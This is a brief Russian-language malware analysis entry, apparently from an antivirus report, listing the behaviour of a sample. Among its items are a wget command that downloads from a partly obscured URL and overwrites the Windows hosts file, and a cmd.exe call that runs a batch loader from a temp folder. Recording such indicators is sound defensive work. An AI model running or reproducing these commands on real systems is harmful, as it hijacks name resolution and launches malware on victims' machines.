Техническая информация
- <Текущая директория>\wget.exe http://ti##url.com/6gay9bc --output-document=<DRIVERS>\etc\hosts
- <SYSTEM32>\cmd.exe /c ""%TEMP%\1.tmp\encrypt_loader1.bat" "
- <Текущая директория>\wget.exe
- %TEMP%\1.tmp\encrypt_loader1.bat
- 'ti##url.com':80
- ti##url.com/6gay9bc
- DNS ASK ti##url.com